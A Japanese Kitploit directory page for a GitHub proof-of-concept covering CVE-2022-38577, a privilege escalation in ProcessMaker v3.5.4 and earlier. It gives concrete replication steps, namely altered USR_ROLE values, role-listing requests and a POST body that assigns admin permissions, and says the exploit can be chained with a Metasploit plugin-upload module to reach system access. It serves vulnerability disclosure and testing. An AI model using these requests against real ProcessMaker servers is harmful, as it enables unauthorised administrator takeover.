Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-38577-Processmaker — ProcessMaker v3.5.4 以前のバージョンでは、ユーザープロファイルページに安全でない権限設定が含まれていることが判明しました。この脆弱性により、攻撃者は通常のユーザーを管理者に昇格させることができます。 | Kitploit
ツール/GitHubGitHub/sornram9254/cve-2022-38577-processmaker
特権昇格エクスプロイトフレームワーク脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストArchived
GitHubsornram9254/cve-2022-38577-processmaker

CVE-2022-38577-Processmaker

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ProcessMaker v3.5.4 以前のバージョンでは、ユーザープロファイルページに安全でない権限設定が含まれていることが判明しました。この脆弱性により、攻撃者は通常のユーザーを管理者に昇格させることができます。

リポジトリを見る
3131年前未レビュー

このリポジトリはアーカイブされ、次の場所に移動しました: https://github.com/sornram9254/CVE-BBP-VDP


ProcessMaker - ユーザープロファイルの権限昇格

CVE-2022-38577

ProcessMaker v3.5.4以前のバージョンでは、ユーザープロファイルページに安全でない権限が含まれていることが判明しました。この脆弱性により、攻撃者は一般ユーザーを管理者に昇格させることができます。

* このエクスプロイトはMetasploitモジュール(ProcessMaker Plugin Upload) - exploit/multi/http/processmaker_plugin_uploadと併用してシステムアクセスを獲得できます。

root@kitploit:~
Privilege Escalation replication.
for 2.5.0 - 3.0 GA:
    1. Log in as normal user.
    2. Change "USR_ROLE" on post request form when updating profile information to "PROCESSMAKER_ADMIN".
    3. Refresh page to get new role.

for 3.2.1 and before:
    1. Log in as normal user.
    2. Get Role ID by request "/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc={epoch_time}"
    3. Get Permission ID by request "/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID={Role_ID}&type=show"
    4. Update role to escalation privileges using POST Body request:
    POST /sysworkflow/en/neoclassic/roles/roles_Ajax
    request=assignPermissionToRoleMultiple&ROL_UID={Role_ID}&PER_UID={PERMISSION_ID}

https://youtu.be/PVaChDG3ZQ0
CVE-2022-38577 : ProcessMaker - ユーザープロファイルの権限昇格

TODO: コードの最適化 [requests モジュール] と例外処理。

参考:
[x] https://nvd.nist.gov/vuln/detail/CVE-2022-38577
[x] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38577
[x] https://packetstormsecurity.com/files/168427/ProcessMaker-Privilege-Escalation.html
[x] https://drive.google.com/file/d/1iP9NYUkYEy_FGMpcnTkUWn8nGcqDT02_/view?usp=sharing

ツールをダウンロード